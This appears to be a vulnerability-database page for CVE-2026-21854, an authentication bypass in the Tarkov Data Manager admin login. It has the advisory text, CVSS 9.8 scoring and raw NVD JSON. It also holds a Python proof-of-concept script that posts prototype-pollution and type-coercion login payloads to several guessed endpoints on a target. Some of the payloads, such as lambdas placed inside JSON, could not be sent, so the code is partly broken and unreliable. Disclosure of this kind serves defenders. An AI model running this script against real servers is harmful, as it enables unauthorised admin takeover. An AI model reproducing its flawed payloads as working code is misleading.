Security Vulnerability Report
中文
CVE-2026-21854 CVSS 9.8 CRITICAL

CVE-2026-21854

Published: 2026-01-07 19:15:57
Last Modified: 2026-02-03 16:21:12
Source: [email protected]

Description

The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, an authentication bypass vulnerability in the login endpoint allows any unauthenticated user to gain full admin access to the Tarkov Data Manager admin panel by exploiting a JavaScript prototype property access vulnerability, combined with loose equality type coercion. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:* - VULNERABLE
Tarkov Data Manager < 2025-01-02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2026-21854 Authentication Bypass PoC # Target: Tarkov Data Manager login endpoint def exploit_auth_bypass(target_url): """ Exploit the authentication bypass vulnerability in Tarkov Data Manager by leveraging JavaScript prototype pollution and loose equality comparison """ # Method 1: Prototype pollution with __proto__ property payload_proto = { "username": {"__proto__": {"isAdmin": True}}, "password": "any_password" } # Method 2: Loose equality type coercion bypass payload_coercion = { "username": "admin", "password": { "toString": lambda: "", "valueOf": lambda: True } } # Method 3: Combined prototype pollution and type confusion payload_combined = { "__proto__": { "constructor": { "prototype": { "admin": True } } }, "username": "", "password": { "__proto__": {"authenticated": True} } } endpoints = [ "/api/auth/login", "/api/login", "/auth/login", "/login" ] for endpoint in endpoints: url = target_url.rstrip('/') + endpoint # Try prototype pollution attack try: response = requests.post(url, json=payload_proto, timeout=10) if response.status_code == 200: data = response.json() if data.get('admin') or data.get('isAdmin') or 'token' in data: print(f"[!] Auth bypass successful at {url}") print(f"[+] Response: {json.dumps(data, indent=2)}") return data except Exception as e: print(f"[-] Error testing {url}: {e}") return None if __name__ == "__main__": target = "https://tarkov-data-manager.example.com" result = exploit_auth_bypass(target) if result: print("\n[!] Vulnerability confirmed - Authentication bypassed") else: print("\n[-] Exploitation failed or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21854", "sourceIdentifier": "[email protected]", "published": "2026-01-07T19:15:57.267", "lastModified": "2026-02-03T16:21:11.813", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Tarkov Data Manager is a tool to manage the Tarkov item data. Prior to 02 January 2025, an authentication bypass vulnerability in the login endpoint allows any unauthenticated user to gain full admin access to the Tarkov Data Manager admin panel by exploiting a JavaScript prototype property access vulnerability, combined with loose equality type coercion. A series of fix commits on 02 January 2025 fixed this and other vulnerabilities."}, {"lang": "es", "value": "El Tarkov Data Manager es una herramienta para gestionar los datos de los ítems de Tarkov. Antes del 02 de enero de 2025, una vulnerabilidad de omisión de autenticación en el endpoint de inicio de sesión permite a cualquier usuario no autenticado obtener acceso de administrador completo al panel de administración del Tarkov Data Manager explotando una vulnerabilidad de acceso a propiedades de prototipo de JavaScript, combinada con la coerción de tipo de igualdad flexible. Una serie de commits de corrección el 02 de enero de 2025 solucionó esta y otras vulnerabilidades."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-843"}, {"lang": "en", "value": "CWE-1321"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tarkov:tarkov_data_manager:*:*:*:*:*:*:*:*", "versionEndExcluding": "2025-01-02", "matchCriteriaId": "1BED0E5B-BD43-4202-930F-9931EC05570C"}]}]}], "references": [{"url": "https://github.com/the-hideout/tarkov-data-manager/commit/f188f0abf766cefe3f1b7b4fc6fe9dad3736174a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/the-hideout/tarkov-data-manager/security/advisories/GHSA-r8w6-9xwg-6h73", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.